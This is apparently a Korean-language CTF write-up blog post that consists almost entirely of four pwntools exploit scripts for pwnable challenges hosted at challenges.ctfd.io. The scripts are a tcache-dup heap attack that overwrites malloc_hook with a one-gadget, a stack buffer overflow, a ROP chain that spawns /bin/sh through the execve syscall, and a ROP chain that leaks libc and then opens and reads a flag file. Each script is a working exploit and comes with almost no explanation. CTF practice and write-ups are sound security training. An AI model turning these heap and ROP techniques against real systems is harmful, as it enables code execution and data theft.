Encrheapt
just malloc and free tcache dup.
it's freaking easy. just do it
from pwn import *
#context.log_level = 'debug'
#p = process("./a.out")
p = remote("challenges.ctfd.io", 30028)
def encrypt(ch, size, con):
p.sendlineafter('3. Exit\n', '1')
p.sendlineafter('2)??: ', str(ch))
p.sendlineafter(' key?:', '1')
p.sendlineafter('How much would you like to encrypt: ', str(size))
p.sendlineafter('What would you like to encrypt: ', con)
p.recvuntil('Here is the encrypted content: ')
return p.recvline()[:-1]
def decrypt(ch):
p.sendlineafter('3. Exit\n', '2')
p.sendlineafter('2)??: ', str(ch))
p.recvuntil('content: ')
return p.recvline()[:-1]
def proc(addr):
return addr ^ 0x0101010101010101
encrypt(1, 2000, 'dummy')
encrypt(2, 1, '1')
#make unsorted bin
decrypt(1)
leak = encrypt(1, 2000, '1')
leak = leak.ljust(8, b'\x00')
leak = u64(leak)
malloc_hook = leak
libc_base = leak - 0x3afc30
one_shot = libc_base + 0x41656
encrypt(2, 0x60, 'dummy')
encrypt(1, 0x60, 'dummy')
decrypt(1)
decrypt(2)
decrypt(2)
#exploit tcache dup
malloc_hook = proc(malloc_hook)
one_shot = proc(one_shot)
encrypt(2, 0x60, p64(malloc_hook))
encrypt(2, 0x60, 'a')
encrypt(1, 0x60, p64(one_shot))
p.interactive()
bof
from pwn import *
context.log_level = 'debug'
p = remote('challenges.ctfd.io', 30027)
#p = process('./bof.out')
p.sendlineafter(':', 'bjloed')
#p.sendlineafter(':', 'A'*42+p32(0x8049236))
p.sendafter(':', 'BB' + 'flag'*6 + p32(0xdeadbeef)*4 + p32(0x8049236) + p32(0x14b4da55)*2 + p32(0) + 'flag' + p32(0))
p.interactive()
tiny-tim
from pwn import *
context.log_level = 'debug'
p = remote('challenges.ctfd.io', 30017)
pop_rdi = 0x401004
pop_rsi = 0x401002
pop_rdx = 0x401006
vuln = 0x401008
secret = 0x401000
syscall = 0x40101e
payload = 'A'*0x20 + 'B'*0x8 + p64(pop_rdi) + p64(0x400000) + p64(pop_rsi) + p64(1024) + p64(pop_rdx) + p64(7) + p64(secret) + p64(10) + p64(syscall) + p64(0x4242424242424242)*5 + p64(secret) + p64(0) + p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(0x400000) + p64(pop_rdx) + p64(0x8) + p64(syscall) + p64(0x4343434343434343)*5 + p64(secret) + p64(59) + p64(pop_rdi) + p64(0x400000) + p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(syscall)
p.send(payload)
p.send('/bin/sh\x00')
p.interactive()
SandboxROP
File Descriptor is 5.
from pwn import *
context.log_level = 'debug'
p = remote('challenges.ctfd.io',30018)
e = ELF('./chal.out')
libc = ELF('./libc.so.6')
pop_rdi = 0x4013a3
pop_rsi_r15 = 0x4013a1
pop_rdx = 0x4011de
bss = 0x404500
main = 0x4012f3
puts_plt = 0x4010b0
puts_got = 0x404028
payload = 'A'*0x10 + p64(bss)
payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x40131f)
p.sendlineafter('shit\n', payload)
leak = u64(p.recv(6).ljust(8, '\x00'))
base = leak - libc.symbols['puts']
fopen = base + libc.symbols['open']
fread = base + libc.symbols['read']
payload = '/pwn/flag.txt\x00\x00\x00' + p64(bss+0x100) #0x4044f0
payload += p64(pop_rdi) + p64(bss-0x10) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(fopen)
payload += p64(pop_rdi) + p64(5) + p64(pop_rsi_r15) + p64(bss+0x200) + p64(0) + p64(pop_rdx) + p64(0x100) + p64(fread) #read
payload += p64(pop_rdi) + p64(bss+0x200) + p64(puts_plt) + p64(0x40131f)
log.info(hex(fopen))
p.send(payload)
p.interactive()
'CTF Write-Up' 카테고리의 다른 글
| [SSTF 2021] Hackers Playground Writeup (2) | 2021.08.18 |
|---|---|
| [RaRCTF 2021] Only Pwn Writeup (1) | 2021.08.10 |
| [UTCTF 2021] Partial Writeup (0) | 2021.03.15 |
| [zer0pts CTF 2021] Partial Writeup (2) | 2021.03.07 |
| [TrollCat CTF] Only Pwnable WriteUp (0) | 2021.02.07 |